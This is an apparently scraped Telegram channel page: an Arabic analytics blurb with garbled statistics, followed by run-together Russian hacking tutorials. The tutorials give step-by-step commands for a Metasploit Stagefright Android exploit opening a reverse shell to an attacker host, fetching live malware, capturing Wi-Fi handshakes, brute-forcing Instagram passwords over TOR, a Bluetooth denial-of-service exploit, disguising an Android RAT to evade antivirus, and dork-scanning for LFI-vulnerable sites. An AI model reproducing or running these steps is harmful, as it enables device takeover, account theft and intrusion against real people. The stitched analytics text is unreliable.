CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام CODE RED
تُعد قناة CODE RED (@coderedcom) في القطاع اللغوي الروسية لاعباً نشطاً. يضم المجتمع حالياً 10 355 مشتركاً، محتلاً المرتبة 9 416 في فئة التكنولوجيات والتطبيقات والمرتبة 61 181 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 10 355 مشتركاً.
بحسب آخر البيانات بتاريخ 03 ديسمبر, 2024، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 0، وفي آخر 24 ساعة بمقدار 0، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 0%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً N/A% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 0 مشاهدة. وخلال اليوم الأول يجمع عادةً 0 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 0.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 04 ديسمبر, 2024) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
exploit/android/browser/stagefright_mp4_tx3g_64bit
Теперь нужно будет последовательно прописать необходимые параметры
SRVHOST <ip>
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true
Остается только запустить скрипт
-j
В окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.git clone https://github.com/ytisf/theZoo
Использование
Запускаем интерфейс командой
python theZoo.py
Далее можно выбрать из базы, к примеру, только ботнеты, прописав
search botnet
Чтобы скачать нужный мальварь вписываем
use <порядковый номер вируса в БД>
Далее просто вводим get и получаем архив с вредоносом и ключи для его расшифровки. В целях безопасности theZoo деактивирует вирусы путем шифрования.
Базу данных можно обновлять командой update-db. Более подробная справка доступна по команде help.git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
Переходим в директорию и запускаем скрипт
◽cd airgeddon/
◽sudo bash airgeddon.sh
В случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав 2. Далее вводим 5, перейдя в раздел работы с хендшейками.
Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду 2. Откроется два окна и после перехвата хендшейка, он появится в одном из них. После нужно будет подтвердить перехват в главном окне с Airgeddon.
Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.git clone https://github.com/thelinuxchoice/instashell
Переходим в директорию и ставим права на исполняемый файл
◽cd instashell
◽chmod +x instashell.sh
Использование
Запускаем сервисы TOR командой
◽service tor start
Запускаем Instashell
◽./instashell.sh
Далее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.git clone https://github.com/4shadoww/hakkuframework
Переходим в директорию и запускаем скрипт установки
◽cd hakkuframework/
◽./install
Использование
Запускаем фреймворк командой
◽./hakku
Чтобы получить список модулей, нужно выполнить show modules. С помощью help получаем справку по инструменту. Далее просто выбираем модуль, и также через help читаем, как им пользоваться.apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Далее обновляем pwntools
pip install --upgrade pip
pip install --upgrade pwntools
Устанавливаем библиотеки для работы с Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Скачиваем эксплоит командой
git clone https://github.com/ojasookert/CVE-2017-0781
В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.
Использование
Сканируем эфир командой
hcitool scan
Выбираем устройство, копируем его MAC адрес и прописываем команду
python CVE-2017-0781.py TARGET=<MAC адрес>
Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы.git clone https://github.com/sslab-gatech/avpass
Запускаем установщик командой
./install-dep.sh
Использование
Далее нам понадобится сгенерированный билд вируса для Android. Это может быть, к примеру, RAT от AhMyth. Для базовой маскировки остается просто прописать
python gen_disguise.py -i <название файла> individual
Сгенерированный apk файл не детектится большинством антивирусов(разве что одним), а его требования к системе скрыты от пользователя при установке.
#хакингgit clone https://github.com/0x3curity/Samurai
Далее нужно будет установить Lynx командой
◽️apt install lynx
И поставить права на исполняемый файл
◽️chmod +x samurai.sh
Использование
Запускаем программу командой
◽️./samurai.sh
Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.
#OSINT #kaligit clone https://github.com/madRubyroid/LFIFucker.git
Далее нужно будет получить CSE-CX. Для этого нужно перейти по ссылке и добавить новую поисковую систему. В поле "Сайты, на которых выполняется поиск" нужно вписать звездочку и желаемую доменную зону, например: .ru. После сохранения, нужно перейти в Панель управления и скопировать значение из поля "Идентификатор поисковой системы".
Также нужен API-ключ для search engine. Здесь просто переходим в GCloud Console, создаем проект и включаем Custom Search API в разделе "Библиотека API". Далее переходим в "Учетные данные" и берем один из трех API ключей.
Остается только вписать эти две строчки в файл lfi.conf в корневом каталоге LFIFucker.
Использование
Для запуска сканирования по дефолтному шаблону и доркам id= и file= к примеру, нужно вписать команду
◽️./LFIFucker.sh --dork-query id=, file=
Результаты о найденных уязвимых сайтах сохранятся в директорию
tmp. Злоумышленнику останется только подобрать метод и осуществить LFI.
#хакингgit clone https://github.com/Testzero-wz/wscan.git
Переходим в папку и запускаем установщик
◽️cd wscan
◽️python3 -m pip install wscan
Использование
Стандартный фаззинг Wscan запускается в одну строчку
◽️wscan -u "http://www.example.com/" -f -m
Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.
Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali